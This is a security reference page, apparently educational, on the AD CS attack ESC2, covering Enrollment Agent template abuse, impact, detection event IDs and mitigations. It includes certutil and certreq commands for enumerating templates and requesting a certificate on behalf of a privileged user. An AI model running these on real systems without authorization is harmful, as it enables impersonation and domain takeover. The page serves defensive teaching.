ESC2: Misconfigured Enrollment Agent Templates

High

ESC2 abuses misconfigured Enrollment Agent templates, allowing an attacker to request certificates on behalf of other users, potentially leading to privilege escalation and unauthorized access.

Warning: The information provided here is for educational purposes only. Always ensure you have proper authorization before testing these attacks in any environment.

Diagram illustrating ESC2 attack vector with Enrollment Agent abuse

Attack Details

ESC2 targets misconfigured Enrollment Agent templates, which allow certain users to request certificates on behalf of others. When these templates are not properly secured, attackers can abuse this functionality to obtain certificates for high-privileged accounts, leading to unauthorized access and potential domain compromise.

Learn more about AD CS defense strategies to protect against this and other attacks.

Impact

Unauthorized certificate issuance for other users
Potential privilege escalation to high-privileged accounts
Identity theft and impersonation
Bypass of multi-factor authentication

Exploitation Steps

Identify vulnerable Enrollment Agent templates
Use the Enrollment Agent template to request a certificate for a high-privileged account
Use the obtained certificate for authentication and privilege escalation

Penetration Testing Considerations

When conducting AD CS penetration testing, consider the following aspects specific to ESC2: Misconfigured Enrollment Agent Templates:

Identify vulnerable certificate templates and misconfigurations
Assess the potential impact on the overall AD CS security
Evaluate the effectiveness of existing security controls
Test for the ability to exploit this vulnerability in the target environment
Document findings and provide actionable remediation steps

Command Examples

Enumerate Enrollment Agent Templates

certutil -v -template | findstr /i "1.3.6.1.4.1.311.20.2.1"

Request and Use Enrollment Agent Certificate

certreq -submit -attrib "CertificateTemplate:EnrollmentAgentTemplate" request.inf

certreq -submit -attrib "CertificateTemplate:UserTemplate" -attrib "SAN:[email protected]" -cert EnrollmentAgentCert.pfx request.inf

Detection

Monitor and log all Enrollment Agent activities
Implement alerting for unusual certificate requests, especially for privileged accounts
Regularly review Enrollment Agent permissions and template configurations

Event IDs

4886: Certificate Services approved a certificate request
4887: Certificate Services denied a certificate request
4738: A user account was changed (for monitoring Enrollment Agent changes)

Mitigation and AD CS Security Best Practices

To mitigate ESC2: Misconfigured Enrollment Agent Templates and enhance overall AD CS security, consider implementing the following measures:

Review and restrict access to Enrollment Agent templates
Implement strict controls on who can act as an Enrollment Agent
Regularly audit Enrollment Agent activities
Use strong authentication for Enrollment Agent operations
Regularly conduct AD CS penetration testing to identify and address vulnerabilities
Implement the principle of least privilege across your AD CS infrastructure
Maintain up-to-date documentation of your AD CS configuration and security policies

References

Related AD CS Attacks

Explore other attack vectors that target Active Directory Certificate Services:

ESC1: Misconfigured Certificate Templates

Critical

ESC1 exploits overly permissive enrollment rights in certificate templates, allowing low-privileged users to enroll in certificates that can be used for authentication, potentially leading to privilege escalation.

Learn More

Diagram illustrating ESC10 attack vector with rogue Certificate Authority

ESC10: Rogue Certificate Authority

Critical

ESC10 involves an attacker creating a rogue Certificate Authority and adding it to the enterprise NTAuth store, potentially allowing the issuance of trusted certificates for any purpose.

Learn More

Diagram illustrating ESC11 attack vector with vulnerable certificate issuance policy

ESC11: Vulnerable Certificate Issuance Policy

High

ESC11 exploits misconfigured certificate issuance policies, allowing attackers to obtain certificates that should be restricted, potentially leading to unauthorized access or privilege escalation.

Learn More

View All AD CS Attacks